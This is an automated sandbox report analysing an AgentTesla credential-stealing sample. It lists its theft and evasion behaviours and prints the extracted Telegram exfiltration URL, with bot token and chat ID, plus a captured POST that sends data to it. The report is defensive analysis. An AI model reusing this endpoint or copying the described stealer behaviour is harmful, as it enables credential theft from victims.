Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Smh3IA9098.exe

Overview

General Information

Sample Name:Smh3IA9098.exe
Original Sample Name:9b75823d12157891fafe183679b54831.exe
Analysis ID:830845
MD5:9b75823d12157891fafe183679b54831
SHA1:1e074aab3a27aebdefa87f520350109c95b31cf4
SHA256:306a4b507ed783c41a906281904642730d4887aac6dcd5d3ee7ba066d0a51efa
Tags:AgentTeslaexeTelegram
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Smh3IA9098.exe (PID: 1004 cmdline: C:\Users\user\Desktop\Smh3IA9098.exe MD5: 9B75823D12157891FAFE183679B54831)
    • Smh3IA9098.exe (PID: 6132 cmdline: C:\Users\user\Desktop\Smh3IA9098.exe MD5: 9B75823D12157891FAFE183679B54831)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendMessage?chat_id=5737638148"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Smh3IA9098.exe PID: 6132JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: Smh3IA9098.exe PID: 6132JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.6149.154.167.220497084432851779 03/20/23-18:29:57.946141
            SID:2851779
            Source Port:49708
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Smh3IA9098.exeReversingLabs: Detection: 33%
            Source: Smh3IA9098.exeVirustotal: Detection: 42%Perma Link
            Machine Learning detection for sample
            Source: Smh3IA9098.exeJoe Sandbox ML: detected
            Source: 0.2.Smh3IA9098.exe.47d8ae0.5.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendMessage?chat_id=5737638148"}
            Source: Smh3IA9098.exe.6132.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendMessage"}
            Source: Smh3IA9098.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.6:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49708 version: TLS 1.2
            Source: Smh3IA9098.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: szrO.pdbSHA256 wV source: Smh3IA9098.exe
            Source: Binary string: szrO.pdb source: Smh3IA9098.exe

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.6:49708 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            May check the online IP address of the machine
            Source: C:\Users\user\Desktop\Smh3IA9098.exeDNS query: name: api.ipify.org
            Source: C:\Users\user\Desktop\Smh3IA9098.exeDNS query: name: api.ipify.org
            Source: C:\Users\user\Desktop\Smh3IA9098.exeDNS query: name: api.ipify.org
            Source: C:\Users\user\Desktop\Smh3IA9098.exeDNS query: name: api.ipify.org
            Source: C:\Users\user\Desktop\Smh3IA9098.exeDNS query: name: api.ipify.org
            Source: C:\Users\user\Desktop\Smh3IA9098.exeDNS query: name: api.ipify.org
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: POST /bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29711b5da886Host: api.telegram.orgContent-Length: 981Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
            Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/
            Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendDocument
            Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
            Source: unknownHTTP traffic detected: POST /bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29711b5da886Host: api.telegram.orgContent-Length: 981Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: api.ipify.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.6:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49708 version: TLS 1.2
            Source: Smh3IA9098.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 0_2_079203910_2_07920391
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 0_2_079203A00_2_079203A0
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 0_2_079201000_2_07920100
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 0_2_079200F00_2_079200F0
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 0_2_07DB00400_2_07DB0040
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 0_2_07DB00070_2_07DB0007
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_02AAC8B81_2_02AAC8B8
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_02AAA8F81_2_02AAA8F8
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_02AA9CE01_2_02AA9CE0
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_02AAA0281_2_02AAA028
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_0672F3371_2_0672F337
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_0672039C1_2_0672039C
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_067230B01_2_067230B0
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_06727CE81_2_06727CE8
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_0672EBD31_2_0672EBD3
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_067288281_2_06728828
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_0672C8F01_2_0672C8F0
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_06779A681_2_06779A68
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_0677D9181_2_0677D918
            Source: Smh3IA9098.exe, 00000000.00000002.275145175.0000000003517000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Smh3IA9098.exe
            Source: Smh3IA9098.exe, 00000000.00000002.277752013.0000000004449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs Smh3IA9098.exe
            Source: Smh3IA9098.exe, 00000000.00000002.277752013.00000000047AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename4fea6f85-f2e4-4165-ba99-4bd867ae23e9.exe4 vs Smh3IA9098.exe
            Source: Smh3IA9098.exe, 00000000.00000002.275145175.0000000003487000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Smh3IA9098.exe
            Source: Smh3IA9098.exe, 00000000.00000002.275145175.0000000003487000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename4fea6f85-f2e4-4165-ba99-4bd867ae23e9.exe4 vs Smh3IA9098.exe
            Source: Smh3IA9098.exe, 00000000.00000002.291943272.0000000007B90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs Smh3IA9098.exe
            Source: Smh3IA9098.exe, 00000000.00000000.252707563.0000000001098000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameszrO.exe> vs Smh3IA9098.exe
            Source: Smh3IA9098.exe, 00000001.00000002.520128183.0000000000B38000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Smh3IA9098.exe
            Source: Smh3IA9098.exe, 00000001.00000002.519751255.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename4fea6f85-f2e4-4165-ba99-4bd867ae23e9.exe4 vs Smh3IA9098.exe
            Source: Smh3IA9098.exeBinary or memory string: OriginalFilenameszrO.exe> vs Smh3IA9098.exe
            Source: Smh3IA9098.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Smh3IA9098.exeReversingLabs: Detection: 33%
            Source: Smh3IA9098.exeVirustotal: Detection: 42%
            Source: Smh3IA9098.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Smh3IA9098.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Smh3IA9098.exe C:\Users\user\Desktop\Smh3IA9098.exe
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess created: C:\Users\user\Desktop\Smh3IA9098.exe C:\Users\user\Desktop\Smh3IA9098.exe
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess created: C:\Users\user\Desktop\Smh3IA9098.exe C:\Users\user\Desktop\Smh3IA9098.exeJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Smh3IA9098.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Smh3IA9098.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Smh3IA9098.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Smh3IA9098.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
            Source: Smh3IA9098.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Smh3IA9098.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Smh3IA9098.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Smh3IA9098.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Smh3IA9098.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: szrO.pdbSHA256 wV source: Smh3IA9098.exe
            Source: Binary string: szrO.pdb source: Smh3IA9098.exe
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 0_2_079235C2 push ss; iretd 0_2_079235C9
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 0_2_0792398A push edx; retf 0_2_0792398D
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_0672300F push es; ret 1_2_06723020
            Source: initial sampleStatic PE information: section name: .text entropy: 7.873571070736306
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
